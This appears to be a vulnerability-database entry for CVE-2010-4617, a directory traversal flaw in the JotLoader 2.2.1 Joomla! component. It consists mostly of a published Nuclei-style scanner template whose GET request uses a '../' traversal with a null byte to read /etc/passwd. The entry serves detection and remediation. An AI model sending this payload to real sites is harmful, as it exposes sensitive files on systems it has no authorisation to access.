CVE-2010-4617: Joomla! Component JotLoader 2.2.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! Component JotLoader | POC: 已公开

漏洞描述

A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.

PoC代码[已公开]

id: CVE-2010-4617

info:
  name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15791
    - https://nvd.nist.gov/vuln/detail/CVE-2010-4617
    - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-4617
    cwe-id: CWE-22
    epss-score: 0.00496
    epss-percentile: 0.64873
    cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kanich
    product: com_jotloader
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fdc8287bead79bf7ca0024a42dcf0cd964f41c1c8700d127dfc1738181d9cf57022100a4d1164f35f6db213fbbbfb2a08eacc07f49d5581ecfc43916526040c2df6662:922c64590222798bb761d5b6d8e72950

相关漏洞推荐